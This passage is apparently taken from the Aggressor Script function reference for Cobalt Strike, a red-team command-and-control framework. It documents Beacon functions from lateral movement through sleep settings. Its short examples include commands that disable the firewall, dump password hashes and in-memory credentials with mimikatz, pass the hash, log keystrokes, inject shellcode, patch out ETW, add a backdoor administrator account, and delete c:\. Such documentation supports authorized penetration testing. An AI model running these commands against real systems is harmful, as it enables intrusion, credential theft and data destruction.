$4 - the function that implements the exploit ($1 is the Beacon ID, $2 is the target, $3 is the listener)

See also

&beacon_remote_exploit_describe, &beacon_remote_exploits, &bjump

Back to Top

beacon_remote_exploits

Get a list of lateral movement options registered with Cobalt Strike.

Returns

An array of lateral movement option names.

Example

printAll(beacon_remote_exploits());
See also

&beacon_remote_exploit_describe, &beacon_remote_exploit_register, &bjump

Back to Top

beacon_remove

Remove a Beacon from the display.

Arguments

$1 - the id for the beacon to remove

Back to Top

beacon_stage_pipe

This function handles the staging process for a bind pipe stager. This is an optional stager for lateral movement. You can stage any x86 payload/listener through this stager. Use &stager_bind_pipe to generate this stager.

Arguments

$1 - the id of the beacon to stage through

$2 - the target host

$3 - the listener name

$4 - the architecture of the payload to stage. x86 is the only option right now.

Example

# step 1. generate our stager
$stager = stager_bind_pipe("my listener");

# step 2. do something to run our stager

# step 3. stage a payload via this stager
beacon_stage_pipe($bid, $target, "my listener", "x86");

# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");

Back to Top

beacon_stage_tcp

This function handles the staging process for a bind TCP stager. This is the preferred stager for localhost-only staging. You can stage any payload/listener through this stager. Use &stager_bind_tcp to generate this stager.

Arguments

$1 - the id of the beacon to stage through

$2 - reserved; use $null for now.

$3 - the port to stage to

$4 - the listener name

$5 - the architecture of the payload to stage (x86, x64)

Example

# step 1. generate our stager
$stager = stager_bind_tcp("my listener", "x86", 1234);

# step 2. do something to run our stager

# step 3. stage a payload via this stager
beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");

# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");

Back to Top

beacons

Get information about all Beacons calling back to this Cobalt Strike team server.

Returns

An array of dictionary objects with information about each beacon.

Example

foreach $beacon (beacons()) {
   println("Bid: " . $beacon['id'] . " is " . $beacon['name']);
}

Back to Top

belevate

Ask Beacon to spawn an elevated session with a registered technique.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the exploit to fire

$3 - the listener to target.

Example

item "&Elevate 31337" {
   openPayloadHelper(lambda({
      binput($bids, "elevate ms14-058 $1");
      belevate($bids, "ms14-058", $1);
   }, $bids => $1));
}
See also

&beacon_exploit_describe, &beacon_exploit_register, &beacon_exploits

Back to Top

belevate_command

Ask Beacon to run a command in a high-integrity context

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the module/command elevator to use

$3 - the command and its arguments.

Example

# disable the firewall
alias shieldsdn {
   belevate_command($1, "uac-token-duplication", "cmd.exe /C netsh advfirewall set allprofiles state off");
}
See also

&beacon_elevator_describe, &beacon_elevator_register, &beacon_elevators

Back to Top

berror

Publish an error message to the Beacon transcript

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

alias donotrun {
   berror($1, "You should never run this command!");
}

Back to Top

bexecute

Ask Beacon to execute a command [without a shell]. This provides no output to the user.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run

Example

bexecute($1, "notepad.exe");

Back to Top

bexecute_assembly

Spawns a local .NET executable assembly as a Beacon post-exploitation job.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the .NET executable assembly

$3 - parameters to pass to the assembly

$4 - (optional) the "PATCHES:" argument can modify functions in memory for the process. Up to 4 "patch-rule" rules can be specified (space delimited).

$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

"patch-rule" syntax (comma delimited): [library],[function],[offset],[hex-patch-value]

library - 1-260 characters
function - 1-256 characters
offset - 0-65535 (The offset from the start of the executable function)
hex-patch-value - 2-200 hex characters (0-9,A-F). Length must be even number (hex pairs).

Notes

  • This command accepts a valid .NET executable and calls its entry point.
  • This post-exploitation job inherits Beacon's thread token.
  • Compile your custom .NET programs with a .NET 3.5 compiler for compatibility with systems that don't have .NET 4.0 and later.

Example

alias myutil {
   bexecute_assembly($1, script_resource("myutil.exe"), "arg1 arg2 \"arg 3\"");
}

Back to Top

bexit

Ask a Beacon to exit.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Die" {
   binput($1, "exit");
   bexit($1);
}    

Back to Top

bgetprivs

Attempts to enable the specified privilege in your Beacon session.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - a comma-separated list of privileges to enable. See:

https://msdn.microsoft.com/en-us/library/windows/desktop/bb530716(v=vs.85).aspx

Example

alias debug {
   bgetprivs($1, "SeDebugPriv");
}

Back to Top

bgetsystem

Ask Beacon to attempt to get the SYSTEM token.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "Get &SYSTEM" {
   binput($1, "getsystem");
   bgetsystem($1);
}

Back to Top

bgetuid

Ask Beacon to print the User ID of the current token

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

bgetuid($1);

Back to Top

bhashdump

Ask Beacon to dump local account password hashes. If injecting into a pid that process requires administrator privileges.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the hashdump dll into or $null.

$3 - (optional) the architecture of the target PID (x86|x64) or $null.

$4 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map.

Example

Spawn a temporary process
item "Dump &Hashes" {
   binput($1, "hashdump");
   bhashdump($1);
}
Inject into the specified process)
bhashdump($1, 1234, "x64");

Back to Top

bind

Bind a keyboard shortcut to an Aggressor Script function. This is an alternate to the bind keyword.

Arguments

$1 - the keyboard shortcut

$2 - a callback function. Called when the event happens.

Example

# bind Ctrl+Left and Ctrl+Right to cycle through previous and next tab.

bind("Ctrl+Left", {
   previousTab();
});

bind("Ctrl+Right", {
   nextTab();
});
See also

&unbind

Back to Top

binfo

Get information from a Beacon session's metadata.

Arguments

$1 - the id for the beacon to pull metadata for

$2 - the key to extract

Returns

A string with the requested information.

Example

println("User is: " . binfo("1234", "user"));
println("PID  is: " . binfo("1234", "pid"));

Back to Top

binject

Ask Beacon to inject a session into a specific process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process to inject the session into

$3 - the listener to target.

$4 - the process architecture (x86 | x64)

Example

binject($1, 1234, "my listener");

Back to Top

binline_execute

Execute a Beacon Object File. This is the same as using the inline-execute command in Beacon.

Arguments

$1 - the id for the Beacon

$2 - the path to the BOF file

$3 - the string argument to pass to the BOF file

$4 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Notes

This functions follows the behavior of *inline-execute* in the Beacon console. The string argument will be zero-terminated, converted to the target encoding, and passed as an argument to the BOF's go function. To execute a BOF, with more control, use &beacon_inline_execute

The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files.

Back to Top

binput

Report a command was run to the Beacon console and logs. Scripts that execute commands for the user (e.g., events, popup menus) should use this function to assure operator attribution of automated actions in Beacon's logs.

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

# indicate the user ran the ls command
binput($1, "ls");

Back to Top

bipconfig

Task a Beacon to list network interfaces.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - callback function with the ipconfig results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Example

alias ipconfig {
   bipconfig($1, {
      blog($1, "Network information is:\n $+ $2");
   });
}

Back to Top

bjoberror

Publishes a job error message to the Beacon transcript. Its primary purpose is to be used in the post-execution job's callback function.

Arguments:

$1 - the id for the beacon to post to.

$2 - the related job id.

$3 - the test to post.

Example:

beacon_execute_postex_job($bid, $null, $dll_content, $args, {
    local('$bid $result %info $type');
    ($bid, $result, %info) = @_;
    $type = %info["type"] ;
    $jid = %info["jid"] ;
    if ($type eq "error") {
        bjoberror($bid, $jid, "[postex-cb: $+ $type $+ ]: " . $result);
    }
    else {
        bjoblog($bid, $jid, "[postex-cb: $+ $type $+ ]: " . $result);
    }
    });

Back to Top

bjobkill

Ask Beacon to kill a running post-exploitation job

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the job ID.

Example

bjobkill($1, 0);

Back to Top

bjoblog

Publishes a job output message to the Beacon transcript. Its primary purpose is to be used in the post-execution job's callback function.

Arguments:

$1 - the id for the beacon to post to.

$2 - the related job id.

$3 - the test to post.

Example:

beacon_execute_postex_job($bid, $null, $dll_content, $args, {
    local('$bid $result %info $type');
    ($bid, $result, %info) = @_;
    $type = %info["type"] ;
    $jid = %info["jid"] ;
    if ($type eq "error") {
        bjoberror($bid, $jid, "[postex-cb: $+ $type $+ ]: " . $result);
    }
    else {
        bjoblog($bid, $jid, "[postex-cb: $+ $type $+ ]: " . $result);
    }
});

Back to Top

bjobs

Ask Beacon to list running post-exploitation jobs.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bjobs($1);

Back to Top

bjump

Ask Beacon to spawn a session on a remote target.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the technique to use

$3 - the remote target

$4 - the listener to spawn

Example

# winrm [target] [listener]
alias winrm {
   bjump($1, "winrm", $2, $3);
}
See also

&beacon_remote_exploit_describe, &beacon_remote_exploit_register, &beacon_remote_exploits

Back to Top

bkerberos_ccache_use

Ask beacon to inject a UNIX kerberos ccache file into the user's kerberos tray

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path the ccache file

Example

alias kerberos_ccache_use {
   bkerberos_ccache_use($1, $2);
}

Back to Top

bkerberos_ticket_purge

Ask beacon to purge tickets from the user's kerberos tray

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias kerberos_ticket_purge {
   bkerberos_ticket_purge($1);
}

Back to Top

bkerberos_ticket_use

Ask beacon to inject a mimikatz kirbi file into the user's kerberos tray

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path the kirbi file

Example

alias kerberos_ticket_use {
   bkerberos_ticket_use($1, $2);
}

Back to Top

bkeylogger

Injects a keystroke logger into a process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - (optional) the PID to inject the keystroke logger into or $null.

$3 - (optional) the architecture of the target PID (x86|x64) or $null.

Example

Spawn a temporary process
bkeylogger($1);
Inject into the specified process
bkeylogger($1, 1234, "x64");

Back to Top

bkill

Ask Beacon to kill a process

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to kill

Example

bkill($1, 1234);

Back to Top

blink

Ask Beacon to link to a host over a named pipe

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to link to

$3 - (optional) the pipename to use. The default pipename in the Malleable C2 profile is the default otherwise.

Note

Use &beacon_link if you want a script function that will connect or link based on a listener configuration.

Example

blink($1, "DC");

Back to Top

blog

Publishes an output message to the Beacon transcript.

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

alias demo {
   blog($1, "I am output for the blog function");
}

Back to Top

blog2

Publishes an output message to the Beacon transcript. This function has an alternate format from &blog

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

alias demo2 {
   blog2($1, "I am output for the blog2 function");
}

Back to Top

bloginuser

Ask Beacon to create a token from the specified credentials. This is the make_token command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user's username

$4 - the user's password

Example

# make a token for a user with an empty password
alias make_token_empty {
   local('$domain $user');
   ($domain, $user) = split("\\\\", $2);
   bloginuser($1, $domain, $user, "");
}

Back to Top

blogonpasswords

Ask Beacon to dump in-memory credentials with mimikatz. This function requires administrator privileges.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - (optional) the PID to inject the logonpasswords command into or $null

$3 - (optional) the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process
item "Dump &Passwords" {
   binput($1, "logonpasswords");
   blogonpasswords($1);
}
Inject into the specified process
beacon_command_register(
   "logonpasswords_inject",
   "Inject into a process and dump in-memory credentials with mimikatz",
   "Usage: logonpasswords_inject [pid] [arch]");

alias logonpasswords_inject {
   blogonpasswords($1, $2, $3);
}

Back to Top

bls

Task a Beacon to list files

Variations

bls($1, "folder");

Output the results to the Beacon console.

bls($1, "folder", &callback);

Route results to the specified callback function.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - (optional) the folder to list files for. Use "." for the current folder.

$3 - (optional) callback function with the ls results. Arguments to the callback are: $1 = beacon ID, $2 = the folder, $3 = results

Example

on beacon_initial {
   bls($1, ".");
}

Back to Top

bmimikatz

Ask Beacon to run a mimikatz command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run. Supports the semicolon ( ; ) character to separate multiple commands

$3 - (optional) the PID to inject the mimikatz command into or $null

$4 - (optional) the architecture of the target PID (x86|x64) or $null

$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Examples

# Usage: coffee [pid] [arch]
alias coffee {
   if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) {
      bmimikatz($1, "standard::coffee", $2, $3);
   } else {
      bmimikatz($1, "standard::coffee");
   }
}
alias double_espresso {
bmimikatz($1, "standard::coffee;standard::coffee");
}

Back to Top

bmimikatz_small

Use Cobalt Strike's "smaller" internal build of Mimikatz to execute a mimikatz command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run. Supports the semicolon ( ; ) character to separate multiple commands

$3 - (optional) the PID to inject the mimikatz command into or $null

$4 - (optional) the architecture of the target PID (x86|x64) or $null

$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Note

This mimikatz build supports:

* kerberos::golden
* lsadump::dcsync
* sekurlsa::logonpasswords
* sekurlsa::pth

All of the other stuff is removed for size. Use &bmimikatz if you want to bring the full power of mimikatz to some other offense problem.

Example

# Usage: logonpasswords_elevate [pid] [arch]
alias logonpasswords_elevate {
   if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) {
      bmimikatz_small($1, "!sekurlsa::logonpasswords", $2, $3);
   } else {
      bmimikatz_small($1, "!sekurlsa::logonpasswords");
   }
}

Back to Top

bmkdir

Ask Beacon to make a directory

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the folder to create

Example

bmkdir($1, "you are owned");

Back to Top

bmode

Change the data channel for a DNS Beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the data channel (e.g., dns, dns6, or dns-txt)

Example

item "Mode DNS-TXT" {
   binput($1, "mode dns-txt");
   bmode($1, "dns-txt");
}

Back to Top

bmv

Ask Beacon to move a file or folder.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file or folder to move

$3 - the destination

Example

bmv($1, "evil.exe", "\\\\target\\\C$\\evil.exe");

Back to Top

bnet

Run a command from Beacon's network and host enumeration tool.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command to run.

Type Description
computers lists hosts in a domain (groups)
dclist lists domain controllers
domain show the current domain
domain_controllers list domain controller hosts in a domain (groups)
domain_trusts lists domain trusts
group lists groups and users in groups
localgroup lists local groups and users in local groups
logons lists users logged onto a host
sessions lists sessions on a host
share lists shares on a host
user lists users and user information
time show time for a host
view lists hosts in a domain (browser service)

$3 - the target to run this command against or $null

$4 - the parameter to this command (e.g., a group name)

$5 - (optional) the PID to inject the network and host enumeration tool into or $null

$6 - (optional) the architecture of the target PID (x86|x64) or $null

$7 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

NOTE:

The domain command executes a BOF using inline_execute and will not spawn or inject into a process

Example

Spawn a temporary process
# ladmins [target]
# find the local admins for a target
alias ladmins {
bnet($1, "localgroup", $2, "administrators");
}
Inject into the specified process
# ladmins [pid] [arch] [target]
# find the local admins for a target
alias ladmins {
   bnet($1, "localgroup", $4, "administrators", $2, $3);
}

Back to Top

bnote

Assign a note to the specified Beacon.

Arguments

$1 - the id for the beacon to post to

$2 - the note content

Example

bnote($1, "foo");

Back to Top

bof_extract

The function extracts the executable code for the specified entry point from the beacon object file.

Arguments

$1 - A string containing the beacon object file.

$2 - Entry point of the code to extract. The default is “sleep_mask”

Example

set BEACON_SLEEP_MASK {
local('$beacon_type $arch $type $handle $data');
($beacon_type, $arch) = @_;
$type = "";
if ($beacon_type ne "default") {
$type = "_ $+ $beacon_type";
}

$handle = openf(script_resource(“sleepmask $+ $type $+ . $+ $arch $+ .o”));
$data = readb($handle, -1);
closef($handle);
return bof_extract($data, “sleep_mask”);
}

Back to Top

bof_pack

Pack arguments in a way that's suitable for BOF APIs to unpack.

Arguments

$1 - the id for the Beacon (needed for unicode conversions)

$2 - format string for the packed data

... - one argument per item in our format string

Note

This function packs its arguments into a binary structure for use with &beacon_inline_execute. The format string options here correspond to the BeaconData* C API available to BOF files. This API handles transformations on the data and hints as required by each type it can pack.

Type Description Unpack With (C)
b binary data BeaconDataExtract
i 4-byte integer BeaconDataInt
s 2-byte short integer BeaconDataShort
z zero-terminated+encoded string BeaconDataExtract
Z zero-terminated wide-char string (wchar_t *)BeaconDataExtract

The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files.

See also

&beacon_inline_execute

Back to Top

bpassthehash

Ask Beacon to create a token that passes the specified hash. This is the pth command in Beacon. It uses mimikatz. This function requires administrator privileges.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user's username

$4 - the user's password hash

$5 - (optional) the PID to inject the pth command into or $null

$6 - (optional) the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process
bpassthehash($1, "CORP", "Administrator", "password_hash");
Inject into the specified process
bpassthehash($1, "CORP", "Administrator", "password_hash", 1234, "x64");

Back to Top

bpause

Ask Beacon to pause its execution. This is a one-off sleep.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - how long the Beacon should pause execution for (milliseconds)

Example

alias pause {
   bpause($1, int($2));
}

Back to Top

bportscan

Ask Beacon to run its port scanner.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the targets to scan (e.g., 192.168.12.0/24)

$3 - the ports to scan (e.g., 1-1024,6667)

$4 - the discovery method to use (arp|icmp|none)

$5 - the max number of sockets to use (e.g., 1024)

$6 - (optional) the PID to inject the port scanner into or $null

$7 - (optional) the architecture of the target PID (x86|x64) or $null

$8 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Example

Spawn a temporary process
bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024);
Inject into the specified process
bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024, 1234, "x64");

Back to Top

bpowerpick

Spawn a process, inject Unmanaged PowerShell, and run the specified command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the cmdlet and arguments

$3 - (optional) if specified, powershell-import script is ignored and this argument is treated as the download cradle to prepend to the command. Empty string is OK here too, for no download cradle. Specify $null to use the current imported PowerShell script.

$4 - (optional) the "PATCHES:" argument can modify functions in memory for the process. Up to 4 "patch-rule" rules can be specified (space delimited).

$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

"patch-rule" syntax (comma delimited): [library],[function],[offset],[hex-patch-value]

library - 1-260 characters
function - 1-256 characters
offset - 0-65535 (The offset from the start of the executable function)
hex-patch-value - 2-200 hex characters (0-9,A-F). Length must be even number (hex pairs).

Example

# get the version of PowerShell available via Unmanaged PowerShell
alias powerver {
bpowerpick($1, '$PSVersionTable.PSVersion');
}

alias powerver2 {
bpowerpick($1, '$PSVersionTable.PSVersion', '', 'PATCHES: ntdll.dll,EtwEventWrite,0,C300');
}

Back to Top

bpowershell

Ask Beacon to run a PowerShell cmdlet

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the cmdlet and arguments

$3 - (optional) if specified, powershell-import script is ignored and this argument is treated as the download cradle to prepend to the command. Empty string is OK here too, for no download cradle. Specify $null to use the current imported PowerShell script.

$4 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Example

# get the version of PowerShell...
alias powerver {
   bpowershell($1, '$PSVersionTable.PSVersion');
}

Back to Top

bpowershell_import

Import a PowerShell script into a Beacon

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the path to the local file to import

Example

# quickly run PowerUp
alias powerup {
   bpowershell_import($1, script_resource("PowerUp.ps1"));
   bpowershell($1, "Invoke-AllChecks");
}

Back to Top

bpowershell_import_clear

Clear the imported PowerShell script from a Beacon session.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias powershell-clear {
   bpowershell_import_clear($1);
}

Back to Top

bppid

Set a parent process for Beacon's child processes

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the parent process ID. Specify 0 to reset to default behavior.

Notes

  • The current session must have rights to access the specified parent process.
  • Attempts to spawn post-ex jobs under parent processes in another desktop session may fail. This limitation is due to how Beacon launches its "temporary" processes for post-exploitation jobs and injects code into them.

Example

alias prepenv {
btask($1, "Tasked Beacon to find explorer.exe and make it the PPID");
bps($1, {
local('$pid $name $entry');
foreach $entry (split("\n", $2)) {
($name, $null, $pid) = split("\\s+", $entry);
if ($name eq "explorer.exe") { bppid($1, $pid);
}
}
});
}

Back to Top

bprintscreen

Ask Beacon to take a screenshot via PrintScr method.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - (optional) the PID to inject the screenshot tool via PrintScr method or $null.

$3 - (optional) the architecture of the target PID (x86|x64) or $null.

Example

Spawn a temporary process
item "&Printscreen" {
binput($1, "printscreen");
bpintscreen($1);
}
Inject into the specified process
bprintscreen($1, 1234, "x64");

Back to Top

bps

Task a Beacon to list processes

Variations

bps($1);

Output the results to the Beacon console.

bps($1, &callback);

Route results to the specified callback function.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - (optional) callback function with the ps results. Arguments to the callback are: $1 = beacon ID, $2 = results

Example

on beacon_initial {
   bps($1);
}

 

alias prepenv {
btask($1, "Tasked Beacon to find explorer.exe and make it the PPID");
bps($1, {
local('$pid $name $entry');
foreach $entry (split("\n", $2)) {
($name, $null, $pid) = split("\\s+", $entry);
if ($name eq "explorer.exe") { bppid($1, $pid);
}
}
});
}

Back to Top

bpsexec

Ask Beacon to spawn a payload on a remote host. This function generates an Artifact Kit executable, copies it to the target, and creates a service to run it and clean it up.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to spawn a payload onto

$3 - the listener to spawn

$4 - the share to copy the executable to

$5 - the architecture of the payload to generate/deliver (x86 or x64)

Example

brev2self();
bloginuser($1, "CORP", "Administrator", "toor");
bpsexec($1, "172.16.48.3", "my listener", "ADMIN\$");

Back to Top

bpsexec_command

Ask Beacon to run a command on a remote host. This function creates a service on the remote host, starts it, and cleans it up.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to run the command on

$3 - the name of the service to create

$4 - the command to run.

Example

# disable the firewall on a remote target
# beacon> shieldsdown [target]
alias shieldsdown {
   bpsexec_command($1, $2, "shieldsdn", "cmd.exe /c netsh advfirewall set allprofiles state off");
}

Back to Top

bpsexec_psh

REMOVED Removed in Cobalt Strike 4.0. Use &bjump with psexec_psh option.

bpsinject

Inject Unmanaged PowerShell into a specific process and run the specified cmdlet. This will use the current imported powershell script.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process to inject the session into

$3 - the process architecture (x86 | x64)

$4 - the cmdlet to run

$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Example

bpsinject($1, 1234, x64, "[System.Diagnostics.Process]::GetCurrentProcess()");

Back to Top

bpwd

Ask Beacon to print its current working directory

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias pwd {
   bpwd($1);
}

Back to Top

breg_queryv

Ask Beacon to query a value within a registry key.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the path to the key

$3 - the name of the value to query

$4 - x86|x64 - which view of the registry to use

Example

alias winver {
   breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "ProductName", "x86");
}

Back to Top

breg_queryv

Ask Beacon to query a value within a registry key.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the path to the key

$3 - the name of the value to query

$4 - x86|x64 - which view of the registry to use

Example

alias winver {
   breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "ProductName", "x86");
}

Back to Top

bremote_exec

Ask Beacon to run a command on a remote target.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the remote execute method to use

$3 - the remote target

$4 - the command and arguments to run

Example

# winrm [target] [command+args]
alias winrm-exec {
   bremote_exec($1, "winrm", $2, $3); {
}
See also

&beacon_remote_exec_method_describe, &beacon_remote_exec_method_register, &beacon_remote_exec_methods

Back to Top

brev2self

Ask Beacon to drop its current token. This calls the RevertToSelf() Win32 API.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias rev2self {
   brev2self($1);
}

Back to Top

brm

Ask Beacon to remove a file or folder.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file or folder to remove

Example

# nuke the system
brm($1, "c:\\");

Back to Top

brportfwd

Ask Beacon to setup a reverse port forward.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port to bind to on the target

$3 - the host to forward connections to

$4 - the port to forward connections to

Example

brportfwd($1, 80, "192.168.12.88", 80);

Back to Top

brportfwd_local

Ask Beacon to setup a reverse port forward that routes to the current Cobalt Strike client.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port to bind to on the target

$3 - the host to forward connections to

$4 - the port to forward connections to

Example

brportfwd_local($1, 80, "192.168.12.88", 80);

Back to Top

brportfwd_stop

Ask Beacon to stop a reverse port forward

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port bound on the target

Example

brportfwd_stop($1, 80);

Back to Top

brun

Ask Beacon to run a command

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run

Note

This capability is a simpler version of the &beacon_execute_job function. The latter function is what &bpowershell and &bshell build on. This is a (slightly) more OPSEC-safe option to run commands and receive output from them.

Example

alias w {
   brun($1, "whoami /all");
}

Back to Top

brunas

Ask Beacon to run a command as another user.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user's username

$4 - the user's password

$5 - the command to run

Example

brunas($1, "CORP", "Administrator", "toor", "notepad.exe");

Back to Top

brunasadmin

REMOVED Removed in Cobalt Strike 4.0. Use &belevate_command with psexec_psh option.

Ask Beacon to run a command in a high-integrity context (bypasses UAC).

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and its arguments.

Notes

This command uses the Token Duplication UAC bypass. This bypass has a few requirements:

  • Your user must be a local admin
  • If Always Notify is enabled, an existing high integrity process must be running in the current desktop session.

Example

# disable the firewall
brunasadmin($1, "cmd.exe /C netsh advfirewall set allprofiles state off");

Back to Top

brunu

Ask Beacon to run a process under another process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID of the parent process

$3 - the command + arguments to run

Example

brunu($1, 1234, "notepad.exe");

Back to Top

bscreenshot

Ask Beacon to take a screenshot.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - (optional) the PID to inject the screenshot tool or $null

$3 - (optional) the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process
item "&Screenshot" {
   binput($1, "screenshot");
   bscreenshot($1);
}
Inject into the specified process
bscreenshot($1, 1234, "x64");

Back to Top

bscreenwatch

Ask Beacon to take periodic screenshots

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - (optional) the PID to inject the screenshot tool or $null

$3 - (optional) the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process
item "&Screenwatch" {
   binput($1, "screenwatch");
   bscreenwatch($1);
}
Inject into the specified process
bscreenwatch($1, 1234, "x64");

Back to Top

bsetenv

Ask Beacon to set an environment variable

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the environment variable to set

$3 - the value to set the environment variable to (specify $null to unset the variable)

Example

alias tryit {
   bsetenv($1, "foo", "BAR!");
   bshell($1, "echo %foo%");
}

Back to Top

bshell

Ask Beacon to run a command with cmd.exe

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run

Example

alias adduser {
   bshell($1, "net user $2 B00gyW00gy1234! /ADD");
   bshell($1, "net localgroup \"Administrators\" $2 /ADD");
}

Back to Top

bshinject

Inject shellcode (from a local file) into a specific process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID of the process to inject into

$3 - the process architecture (x86 | x64)

$4 - the local file with the shellcode

Example

bshinject($1, 1234, "x86", "/path/to/stuff.bin");

Back to Top

bshspawn

Spawn shellcode (from a local file) into another process. This function benefits from Beacon's configuration to spawn post-exploitation jobs (e.g., spawnto, ppid, etc.)

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process architecture (x86 | x64)

$3 - the local file with the shellcode

Example

bshspawn($1, "x86", "/path/to/stuff.bin");

Back to Top

bsleep

Ask Beacon to change its beaconing interval and jitter factor.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the number of seconds between beacons.

$3 - the jitter factor [0-99]

Example

alias stealthy {
   # sleep for 1 hour with 30% jitter factor
   bsleep($1, 60 * 60, 30);
}

Back to Top

bsleepu

Ask Beacon to change its beaconing interval and jitter factor.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - beacon sleep period string.

The beacon sleep period string takes the format: ud vh xm ys zj

Were:

w is the number of days

v is the number of hours

x is the number of minutes

y is the number of seconds

z is the jitter factor [0 - 99]

Example

            alias stealthy {
   # sleep for 2 days 13 hours 45 minutes 8 seconds with 30% jitter factor
   bsleepu($1, "2d 13h 45m 8s 30j");
}
        

Back to Top

bsocks

